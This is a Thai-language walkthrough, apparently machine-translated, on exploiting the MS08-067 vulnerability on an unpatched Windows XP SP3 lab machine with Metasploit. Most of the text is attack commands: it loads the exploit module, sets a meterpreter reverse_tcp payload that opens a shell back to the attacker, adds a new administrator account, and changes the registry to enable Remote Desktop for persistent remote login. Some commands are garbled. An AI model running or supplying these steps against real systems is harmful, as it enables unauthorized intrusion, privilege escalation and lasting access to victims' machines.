การใช้ประโยชน์จากช่องโหว่ Ms08_067_netapi บนระบบ WIN xp sp3

Exploitation Ms08_067_netapi Vulnerability Win Xp Sp3 System



Ms08_067_netapi เป็นเพย์โหลดการโจมตีล้นที่ค่อนข้างเก่าใน Metasploit การโจมตีจะได้รับอำนาจที่ค่อนข้างสูง
1: การเตรียม: ระบบ WINxp sp3 (ไม่มีแพทช์) ลิ้งค์ดาวน์โหลด: http://blog.csdn.net/sql_injection/article/details/47683419 โจมตี kali ip: 192.168.243.133 เครื่องเป้าหมาย ip: 192.168.243.136 2: หลังจากการเตรียมการเสร็จสิ้นให้เปิด kali และเปิดเทอร์มินัลmsfconsole framework ใน metasploit คำสั่ง: msfconsole คุณต้องเชื่อมต่อกับ postgresql ก่อนเปิด metasploit: service postgresql statr 3: ค้นหาและโหลดโมดูล Ms08_067 (1): ใช้คำสั่งค้นหาเพื่อค้นหาโมดูลนี้:search ms08_067_netapi(2): ที่อยู่โมดูลที่ค้นหาโดยแอปพลิเคชัน:use exploit/windows/smb/ms08_067_netapi 4:มาโหลดน้ำหนักบรรทุก: set payload windows/meterpreter/reverse_tcp
หลังจากโหลดแล้วคุณสามารถดูพารามิเตอร์ที่ต้องตั้งค่าได้:show options
จากนั้นดังที่แสดงด้านล่าง:
5: ดังแสดงในรูปด้านบน RHOST คือ ip ของโดรนและ LHOST คือ ip ของ kali:set RHOST attacked ip set LHOST attacked ipจากนั้นโจมตี:exploit

6: หลังจากคำสั่ง meterpreter ปรากฏขึ้นการโจมตีจะสำเร็จ ในเวลานี้ให้ป้อนเชลล์เพื่อเข้าสู่อินเทอร์เฟซ cmd ของเครื่องเป้าหมายเพื่อสร้างผู้ใช้ใหม่และเพิ่มอำนาจ:
(1): สร้างผู้ใช้:user net username password /add
(2): การเลื่อนระดับขวา:net localgroup administrators wmc /add



7: หลังจากเพิ่มสิทธิ์แล้วคุณสามารถเข้าสู่ระบบจากระยะไกลได้ แต่ในขณะนี้ให้ตรวจสอบว่าเครื่องเป้าหมายเปิดพอร์ต 3389 หรือไม่เนื่องจากพอร์ตนี้ใช้สำหรับการเชื่อมต่อระยะไกล: (1): ตรวจสอบว่าจะเปิด:netstat -na


(2): ไม่ชัดแล้วเราจะเปิดมัน: REG ADD HKLMSYSTEMCurrentControlSetControlTerminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f อย่างที่คุณเห็นพอร์ต 3389 ถูกเปิดแล้ว
8: จากนั้นใช้ระบบท้องถิ่นของคุณเองเพื่อเชื่อมต่อและทำสิ่งต่างๆจากระยะไกล: (1) เปิด cmd และป้อนคำสั่งการเชื่อมต่อระยะไกล: (2) ป้อนที่อยู่ IP ของเครื่องเป้าหมายสำหรับชื่อคอมพิวเตอร์ในขณะนี้จากนั้นป้อนชื่อผู้ใช้และรหัสผ่านที่คุณสร้างขึ้นเอง:
(3): ป้อนเรียบร้อยแล้ว:
ขณะนี้การดำเนินการทั้งหมดเสร็จสมบูรณ์แล้วสรุป: ในขณะนี้ผู้ใช้ใหม่ที่คุณสร้างขึ้นยังมีอยู่ในเป้าหมาย ใช้โดรนที่ไม่มีแพทช์มิฉะนั้นการโจมตีจะล้มเหลว